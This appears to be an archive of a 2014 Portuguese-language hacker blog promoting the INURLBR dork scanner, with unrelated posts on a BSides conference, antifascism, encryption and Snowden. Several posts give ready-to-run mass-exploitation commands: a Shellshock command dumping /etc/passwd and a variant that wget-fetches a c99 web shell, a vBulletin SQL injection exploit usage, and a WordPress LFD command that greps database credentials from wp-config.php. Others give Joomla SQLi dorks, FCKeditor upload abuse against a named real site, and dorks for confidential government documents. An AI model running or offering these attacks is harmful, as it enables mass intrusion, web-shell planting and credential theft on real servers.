Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 30 de setembro de 2014

SCANNER [ INURL BR ] + [ SHELLSHOCK ] - Exploit em massa



Eae cybers vândalos, a galera que trabalha na área de tecnologia com certeza já ouviu falar na nova vulnerabilidade que saiu "Shellshock". para mais informações sobre a falha clique no link.

 Vamos para o que importa, nossa equipe montou uma linha de comando para ser usando com nosso scanner ( SCANNER INURL BR ) para explorar essa vulnerabilidade em massa.

[ Dorks ]

DORK[0]=> site:gov.br inurl:/cgi-sys/defaultwebpage.cgi
DORK[1]=> site:.br inurl:/cgi-sys/defaultwebpage.cgi


Lista de dorks CGI ( Créditos pela lista "Takedown" )
 http://pastebin.com/7aD2uZR3 

[ 0xComando ]

php inurlbrazil.php --dork 'inurl:/cgi-sys/defaultwebpage.cgi & inurl:defaultwebpage.cgi ext:cgi' -s ../cgi.txt3 --comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'

  Explicação do comando:
  "--comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'"

No parâmetro --comand-all ele define o exploit que vai ser usado nas url que o scanner listo, que executa o comando "cat /etc/passwd" que vai jogar todas as senhas do servidor no arquivo "~/cgi-sys/inurlbr.txt" depois ele executa o curl "curl http://_TARGET_/cgi-sys/inurlbr.txt'" para fazer a leitura do arquivo inserido!


[ Variação de comando ] 
 curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
 
Você pode variar o comando do exploit para se adaptar a sua vontade ou exploração.


Demo:


quarta-feira, 24 de setembro de 2014

Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP)

Co0L BSidesSP

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento entre os participantes e divulgar os valores positivos e inovadores da cultura hacker.

A Co0L BSidesSP é um evento gratuito que faz parte das conferências “Security B-Sides” existentes em mais de 60 cidades de onze países diferentes, que são mini-conferências voltadas para a comunidade. A C0oL BSidesSP pretende oferecer atividades que promovam a segurança da informação e a cultura hacker, com diversas atividades programadas para acontecer simultaneamente, incluindo duas trilhas de palestras técnicas, debates, oficinas e um “Churrascker”.

A décima edição da conferência ocorrerá no dia 23 de Novembro de 2014 (domingo) , no final de semana anterior a conferência BlackHat Summit São Paulo, uma das mais importantes conferências de segurança brasileiras.

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) ocorrerá no domingo, dia 23 de Novembro de 2014, aproveitando o final de semana que antecede a conferência BlackHat Summit São Paulo.
Neste dia terá várias atividades em paralelo, incluindo:

  • Duas trilhas de palestras técnicas
  • Várias oficinas simultâneas
  • Diversas competições no Capture The Flag (CTF)
  • Atividades diversas para fortalecer a comunidade, como a "Hacker Job Fair" e a Brazilian Arsenal
  • Palestras Relâmpago (Lightning Talks)
  • A BSidesSP 4 Kids, com atividades para crianças e adolescentes
  • Sala de descompressão, com lojinhas
  • “Churrascker” gratuito para os presentes.

As palestras terão 40 minutos de duração com 10 minutos para perguntas e respostas e para permitir a movimentação do pessoal. As oficinas serão práticas (hands-on), com 1h30 de duração cada uma.

No brasil já aconteceu varias edições do Security BSides 

  1. May 6, 2012 - Co0L BSidesSP (Sao Paulo) 
  2. October 21, 2012 - BSidesSP (parallel with Hackers to Hackers)
  3. May 19, 2013 - BSidesSP (parallel with You Sh0t the Sheriff)
  4. October 6, 2013 - BSidesSP (parallel with Hackers to Hackers)
  5. November 24, 2013 - BSidesSP (Before BH)
  6. April 13, 2014 - BSidesSP (preceding You Sh0t the Sheriff)
  7. June 15, 2014 - BSidesSP (WorldCup Edition)
  8. November 25-26, 2014 - BSidesSP (before Black Hat)

Projeto interessantes também vinculados ao evento.

0xHacker Job Fair


A "Hacker Job Fair" é uma iniciativa da Co0L BSidesSP para aproximar a comunidade de estudantes e profissionais com o mercado de trabalho, abrindo a oportunidade para discussão sobre carreira e desenvolvimento profissional com empresas e faculdades.

0xBrazilian Arsenal


O "Brazilian Arsenal" é um espaço para divulgar os projetos de ferramentas de segurança open source desenvolvidas por brasileiros, com objetivo de apoiar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para ajudá-los.


Mais detalhes sobre o evento:
https://www.garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10
http://www.securitybsides.com/w/page/82545220/BSidesSaoPaulo_Nov2014

Twitter profile: @BSidesSP
Youtube: https://www.youtube.com/user/bsides2013/videos

sexta-feira, 19 de setembro de 2014

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

0xSCAN + EXPLOIT

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

----------------------------------------------------------------------------------------------------------

0x[+] Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
                              Linux / Mozilla Firefox

------------------------------------------------------------------------------------------------

0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar

0xVÍDEO[0]


0xVÍDEO[1]



0xCOMANDO INURLBR EXEMPLO={

./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"


}


0xSCRIPT INURLBR =  {

https://github.com/googleinurl/SCANNER-INURLBR

}

0xEXPLOIT Joomla Plugin Calendar = {

http://1337day.com/exploit/22603

}

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


sábado, 13 de setembro de 2014

0xHacking Antifascista

Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.  Hack ou hacking antes de tudo é uma ideologia de união na internet, Cogido livre, Acesso a informação e combate direto contra governo e seus meios de censura web.


Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.

Hack ou hacking antes de tudo é uma ideologia de união na internet,
Código livre, Acesso a informação e combate direto contra governo e seus meios de censura web.

- Hacking vai além do deface e um By meunome.
- Hacking é subversão.
- Hacking é compartilhamento livre do conhecimento.

Foi dessa ideologia que surgiu o Cypherpunk onde seu principal objetivo é usar criptografia como arma.

Com o grande poder que hoje é contido na internet governos, grupos fascistas, pedófilos, religiosos extremistas entre outros círculos de "cidadãos de bem" tem alastrado-se igual um worms, propagando ameças, comentários racistas & machistas entre os outros de extremismos conservador.

Uma pesquisa rápida no Facebook/Google podemos encontrar desde paginas que propagam racismo a pages propagam ideias de estupros que caracterizam a mulher como ser inferior.

Então fica uma dica pra quem está querendo conhecer o mundo hacking ou que já está nele.
- Hacking é subversão e não cooperação com sistema.
- Hacking é ação direta contra grupos de repressão,censura ou que propagam ódio, E não o site da padaria pra por no seu ZONE-H.

De todos para todos:

Neither war between hackers, nor peace for the system.
Devemos combater o fascismo dentro e fora da internet.

Conheça um pouco do Antifascismo 

# Antifascismo -

Luta absoluta contra o fascismo, nazismo, golpismo, capitalismo, racismo, machismo, homofobia, transfobia, xenofobia e todos os extremismos conservadores que estão inseridos na sociedade através de discursos tendenciosos.

# Como surgiu -

A Ação Antifascista nasceu da união entre os anarquistas e os comunistas tendo um único inimigo em comum: o fascismo. Essa união se deu não através de idealizações políticas em grupos com características próprias mas, sim através da realidade cotidiana ao analisar a sociedade e perceber o risco eminente de uma extrema-direita forte, com poderes institucionais ou militares.
Como a história nos mostra, esses totalitarismos políticos/ideológicos são um risco a liberdade de expressão cultural e social, por isso é de total importância a formação de um movimento unido contra esses grupos intolerantes que almejam o poder político dentro de nossas cidades.
O nazismo e outros regimes totalitários demonstraram uma necessidade urgente de colocar dentro do nosso cotidiano uma cultura antifascista, negando, desse modo, qualquer valor que incentive o fundamentalismo/dogmatismo.
A tendência antifascista é libertária, pois, se coloca contrária aos sectarismos dos grupos que combatemos, ou seja, todos que compartilham das mesmas ideias são bem-vindos.
Todos que desejam levantar a bandeira da luta antifascista devem abandonar posturas machistas, sexistas, transfobicas, homofóbicas, misógenas, xenofobicas, extremismos religiosos/ideológicos, nacionalismos e tudo aquilo que não tenha coerência com o histórico de luta da Ação Antifascista em todos os seus anos de combate a opressão tanto da sociedade como do sistema.

# Métodos -

Ação Direta.

A ação direta sempre foi uma das principais características da luta antifascista, surgindo como uma resposta agressiva a intolerância da extrema-direita. Conhecendo a realidade das ruas, sabemos que existem grupos que perseguem e utilizam da violência para coagir todos aqueles que são contrários ao seu modelo de sociedade perfeita. White Powers (nazistas), carecas (nacionalistas), integralistas entre outros, espalham discursos de ódio utilizando o medo para atingir seus objetivos. Por este motivo, a autodefesa é algo de extrema importância para nossa integridade física meio a uma ameaça de agressão, afinal, com esses militantes não existe o diálogo.
Por compreender a importância de uma linha de frente forte contra esses grupos nas ruas, muitos Antifas organizam grupos autônomos em suas regiões e combatem o fascismo de forma mais exaltada e prática. O objetivo é fazer os radicais da extrema-direita retrocederem em suas perseguições a pessoas desprotegidas e limpar regiões de grupos extremistas que possam vir a agredir outras pessoas. Esses grupos Antifas atuam de forma descentralizada e sem lideranças; respondem às necessidades dos respectivos lugares que residem; carregam características próprias ideologicamente e culturalmente falando, porém com um objetivo em comum: lutar contra o fascismo.

Conhecimento.

Estudar é importante principalmente para você não se tornar aquilo que combate, para saber criticar aquilo que se critica e o por que de criticar. Talvez esse seja o principal método de se combater o fascismo e seus adjetivos. Conhecer, entender e refletir é o caminho mais seguro para uma consciência tranquila.
Não tenha preguiça! Leia...

Intervenção.

A intervenção é outra ação importante dentro do antifascismo, através dela fortalecemos a oposição ao fascismo.
A arte sempre foi ligada ao movimento antifascista pois com ela podemos passar mensagens muito mais profundas, ela fortalece a reflexão,
utilizamos a subversão no lugar da doutrinação.
Posters colados nas ruas, stencils, grafites, tudo aquilo que for divulgar o movimento é de extrema importância. Quanto mais mostrarmos que estamos nas ruas, mais intimidaremos os grupos que combatemos e instigaremos a curiosidade das pessoas a respeito do assunto.

Mobilização popular.

Organizar movimentos e atos contra políticas e grupos conservadores que tentem se levantar como alternativa é de extrema necessidade, lembrando que um antifascista nunca impõe seu ideal e sim o defende! Todos devem estar dispostos a se unir nas ruas contra qualquer ameaça fascista que venha surgir.

# Organização -

A ação antifascista nunca foi um movimento de unidade e institucionalizado, ela mantém-se descentralizada e totalmente autônoma.
Existem diversos grupos e coletivos antifascistas que atuam em combate ao fascismo. Não existem lideranças nem hierarquias.
Cada célula tem seus critérios e métodos de ação, e tem total liberdade para militar da forma que acharem mais conveniente, sempre visando a coerência da bandeira Antifa.

# Objetivos - 

Jamais deixar movimentos totalitários crescerem em nossas cidades, combater grupos que utilizam da violência para espalhar intolerância, fortalecer seu local Antifa e ser solidário aos camaradas de luta.

Qualquer duvida nos mande mensagem via inbox.

Antifa Unida!
Nunca dividida!

https://www.facebook.com/AntifascistaBrasil/photos/pb.414425795343798.-2207520000.1410638585./609259885860387/?type=3&theater

https://pt.wikipedia.org/wiki/Cypherpunk

quinta-feira, 4 de setembro de 2014

FALHA! Injeção de SQL em vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2 (Exploit + Vídeo)

vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.



vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.

Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.

A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.

Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:

Vídeo demostrativo=>




Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br

DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org


Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).

Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'

Demostrativo=>
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o scanner INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner.


Fontes=>{

[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452

}

segunda-feira, 1 de setembro de 2014

Projeto VLOG - Chmod777

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação. Criado pelo nosso amigo @unknownantisec.  Com grande prazer aparecemos nesse projeto, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

Um dos primeiros canais brasileiro que vai abordar tema tecnologia e segurança da informação.
Criado pelo nosso amigo @unknownantisec.

Com grande prazer aparecemos nesse projeto em sua estreia, Danilo Vaz/unknownantisec fala sobre nossa ferramenta SCANNER INURLBR que utiliza motores de busca para achar possíveis vulneráveis web.

0x02 - Scanner de DORK e Post sobre MiniDOM



Blog=> http://unknownsec.wordpress.com
Canal Youtube Chmod777 => https://www.youtube.com/channel/UCIFnNrMA0SvXeUWY3xXag2A
SCRIPT INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 27 de agosto de 2014

WordPress Plugin KenBurner Slider LFD

[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo. Bom vamos la



[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo.
Bom vamos la



[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider

Comando

"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "

Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "



SCRIPT SCANNER INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR
DD

FBI alerta sobre pesquisas avançadas no Google

FBI alerta sobre pesquisas avançadas no Google

Google Hacking sinalizado como potencial risco


Um boletim emitido pelo Departamento de Segurança Interna, o FBI e o Centro Nacional de Contraterrorismo no início deste mês avisa policiais e agentes de segurança privada que os cibernéticos maliciosos podem usar "técnicas avançadas de busca" para descobrir informações confidenciais e outras vulnerabilidades em websites. O boletim, intitulado "Malicious Cyber Actors Use Advanced Search Techniques ", descreve um conjunto de técnicas colectivamente referidos como "Google dorking" ou "Google hacking" que usam "operadores avançados" para refinar buscas para fornecer resultados mais específicos. Listas de estes operadores são fornecidos pelo Google.

RECURSO EM DESTAQUE 

Apresentado por Riverbed Technology 

10 Problemas comuns APM ajuda você a resolver
Conselhos práticos para que você possa tirar o máximo proveito dos benefícios da APM e manter seu ambiente de TI.
O memorando é bastante simples, mas o conteúdo sai como algo que faz pensar por que é necessário tal advertência em primeiro lugar. Isto é, até você começar a procurar os documentos no espaço de domínio do governo. Então, tudo faz sentido.
Ele passa a referenciar de várias flags que podem ser usados ​​no Google para encontrar informações, incluindo o tipo de arquivo, local, URL, e em operadores de texto. Google faz uma lista completa de operadores válidos que é disponível online.

OPERADORES ONLINE=>
https://sites.google.com/site/gwebsearcheducation/advanced-operators

É um exemplo, a nota destaca um incidente em 2011, onde os atacantes utilizado Google Hacking para descobrir números de segurança social em um servidor FTP Yale University. Outro incidente apontados no memorando centrou-se nas 35 mil sites que foram comprometidos após atacantes usaram o Google para localizar instalações vBulletin vulneráveis.

Uma rápida pesquisa no Google mostra que a nota não faz um ponto válido, como muitos dos sites indexados no espaço do governo oferecem uma variedade de documentos disponíveis para consumo público.

No entanto, do ponto de vista de um atacante, os formulários e documentos internos -, bem como os detalhes de contato sobre alguns deles - oferecem uma maneira de falsa legitimidade durante um ataque direcionado. Muitos dos documentos têm um contexto interno, algo que pode ser aproveitada pelos atacantes, a fim de arranjar algo para abrir um anexo, além disso, os próprios documentos contêm metadados.

Acessando esses documentos em uma ferramenta como o FOCA (Fingerprinting Organizations with Collected Archives), revela detalhes adicionais, tais como autor, endereços de email, convenções de nomeação de rede (incluindo os compartilhamentos de rede), caminhos do sistema (útil para o mapeamento de uma rede ou sistema), títulos de software e números de versão, endereços IP e dados do sistema operacional.

FOCA (Fingerprinting Organizations with Collected Archives)=>         https://www.elevenpaths.com/labstools/foca/index.html

A pesquisa abaixo oferece um exemplo do que o memorando está falando, mas ele terá de ser ajustado a fim de descobrir alguns dos documentos sensíveis. Além disso, as listas prontamente disponíveis de operadores para pesquisa de vulnerabilidades em sites podem ser encontrados por toda a Web, como a lista.

DORK=>
filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"

LISTA=>
http://pastebin.com/6tghmhzh

O memorando recomenda que administradores de sites usam robots.txt para evitar diretórios com informações confidenciais sejam indexados, e incentivou o uso do Google Hacking para descobrir os arquivos que já estão no domínio público. De lá, eles podem ser removidos do Google, seguindo as diretrizes do gigante das buscas.

DORK=> Confidential filetype:xls site:.gov
DORK=> Confidential filetype:xls site:.gov



DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"
DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"



Lista simples de operadores.
allintext: / intext:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no texto da página

allintitle: / intitle:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no título

allinurl: / inurl:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar na URL

filetype:suffix      Resultados limites para páginas,arquivos cujos nomes terminam em sufixo

site:                      Usando o operador site: restringe os resultados da pesquisa para o site ou domínio que você especificar

sinal negativo  ( – )   excluir Colocar um sinal de menos imediatamente antes de uma palavra indica que você não quer que as páginas que contêm esta palavra a aparecer em seus resultados

Pesquisa de frase (o uso de aspas duplas, “…” ) Ao colocar aspas em torno de um conjunto de palavras, você está dizendo Google para considerar as palavras exatas em que ordem exata, sem qualquer alteração

Documento=> Malicious Cyber Actors Use Advanced Search Techniques
Documento=> Malicious Cyber Actors Use Advanced Search Techniques

FONTE: http://www.csoonline.com/article/2597556/social-engineering/fbi-issues-warning-about-creative-google-searches.html 

sábado, 23 de agosto de 2014

Public Key Encryption



O que é Encriptação ?




Encriptação é o processo de proteção de dados de uma forma que ele seja transmitido de maneira aberta sem estar legível até o momento que o recipiente pretendido o receba e seja decifrado com uma chave.

Há dois tipos principais de encriptação: Encriptação de Chave Simétrica e Chave Pública. A diferença entre os ambas é muito importante.

Com criptografia de chave simétrica, somente alguém que conheça a chave pode descriptografar as mensagens criptografadas com a mesma chave. Isto significa que se você quiser enviar uma mensagem criptografada á alguém, ele terá de conhecer a chave que você usou para criptografar-la anteriormente, ou ele não será capaz de decifrar e receber a mensagem. A segurança desta chave usada é muito importante, se a chave for comprometida então todas as mensagens anteriormente criptografadas com ela poderão ser reveladas.

Com criptografia de chave pública, na verdade duas chaves distintas. A chave pública e uma chave privada. Você pode distribuir livremente a sua chave pública para qualquer um, mas sua chave privada você deve manter para si mesmo. Um par de pessoas podem trocar chaves públicas, e comunicar uma com a outra de forma segura, mesmo que um intruso intercepte as duas chaves públicas. Isto ocorre porque as chaves públicas e privadas estão matematicamente interligadas - possibilitando distribuir suas chaves públicas livremente no começo, e então, com segurança após a troca inicial criptografando usando cada sua chave privada. Este conceito pode parecer um pouco confuso, mas é realmente bastante simples após você compreender como funciona.


Public Key Encryption

A criptografia de chave pública

Por volta de 1970, Criptografia de chave simétrica era a única opção real para criptografar e descriptografar a mensagem. O principal problema com criptografia de chave simétrica é que ambas as partes envolvidas na comunicação precisa saber a chave usada de antemão, ou de alguma forma se comunicar com segurança. Além disso, para cada pessoa e indivíduo que queira se comunicar, devem usar uma chave separada do resto de suas comunicações.

O método de encriptação de chave pública veio da ideia que trancar e abrir são funções inversas. Por exemplo, Alice poderia comprar uma tranca, pegar a chave e enviar a tranca para o Bob desatracada. Bob então trancaria sua mensagem e enviaria de volta a Alice - que ainda com a chave, poderia destranca-la. Sem as chaves serem compartilhadas, certo?

Isso significa que Alice pode publicar sua tranca (ou Chave Pública) livremente e permitir que qualquer um lhe envie uma mensagem com ela. Uma vez que a mensagem é trancada, criptografada, ela não pode ser interceptada por terceiros. Ambas as chaves são relacionadas matematicamente, apenas quem conhecer ambas as chaves pública e privada poderá descriptografar as mensagens encriptadas com a chave pública. Além disso, Alice agora só precisa manter o controle de um único par de chaves pública e privada, invés de diversas chaves para cada comunicação.



Hash Functions

Uma função hash é um algoritmo (ou sub-rotina) que mapeia uma quantidade arbitrária de dados dentro de uma extensão fixada "hash" - uma curta sequência de letra e números. Hashes são usadas para comparar dois conjuntos de dados sem ter de olhar completamente os dados.

terça-feira, 19 de agosto de 2014

Scanner de Falhas em Servidores Supermicro IPMI/BMC

Scanner de Falhas em Servidores Supermicro IPMI/BMC
Como sabemos há poucos dias foi descoberta uma falha que expõe mais de 32 mil senhas administrativas dos servidores que utilizam a motherboard da Supermicro, estas senhas estão expostas com acesso pela porta 49152.

Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.

Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ

Basta copiar o código abaixo e colar em um arquivo com o nome supermicro_scan.sh

Lembrando Este script é para utilizadores de LINUX.

SCRIPT=> {     http://pastebin.com/epQmZne8      }
FONTE=>  {   http://virusbrasil.com.br/?p=106  }

segunda-feira, 18 de agosto de 2014

JOOMLA YOUTUBE GALLERY 4.1.7 SQL INJECTION

Joomla Youtube Galeria componente versão 4.1.7 sofre de uma vulnerabilidade de injeção SQL
Joomla Youtube Galeria componente versão 4.1.7 sofre de uma vulnerabilidade de injeção SQL


Exploit Título: com_youtubegallery componente Joomla - vulnerabilidade de injeção SQL 
DORK[0]: inurl:index.php?option=com_youtubegallery 
Vendedor Homepage: http://www.joomlaboat.com/youtube-gallery 
Software Link: http://www.joomlaboat.com/youtube-gallery 
Versão: 4.x (3.x talvez) 
Testado em: nova versão 4.1.7 em Joomla 1.5, 2.5, 3 
CVE: CVE-2014-4960 

EXEMPLO=>
http://TARGET/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1{SQL-INJECTION}&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

sexta-feira, 8 de agosto de 2014

AntiDef

Antidef é um projeto de código aberto que ao menos em teoria planeja da trabalho a pratica do defacement o projeto cria backups e uma criptografia e criando uma hash md5 em cada arquivo do host e uma criptografia final apos a execução.
Qualquer tentativa de mudança de arquivos as hash geradas serão comparadas havendo incompatibilidade a alteração do arquivo não sera bem sucedida assim o defecement é impedido.

0x Pagina do Antidef ==> http://sourceforge.net/projects/antidef 



quinta-feira, 7 de agosto de 2014

Snowden recebe três anos de residência Russo.

Ex-analista de inteligência dos EUA revelou a existência de um sistema de espionagem por parte do governo americano.

Ex-analista de inteligência dos EUA revelou a existência de um sistema de espionagem por parte do governo americano.


O ex-analista de inteligência americano Edward Snowden foi autorizado a permanecer mais três anos na Rússia, onde mora há um ano, anunciou nesta quinta-feira seu advogado, Anatoli Kucherena.

Snowden, que trabalhou para a Agência Nacional de Segurança (NSA) e revelou a existência de um sistema generalizado de espionagem eletrônica em todo o mundo por parte do governo americano, "obteve o direito de residir durante três anos em território russo", afirmou seu advogado em uma entrevista coletiva em Moscou. Esta nova autorização permitirá que ele viaje ao exterior, explicou Kucherena.

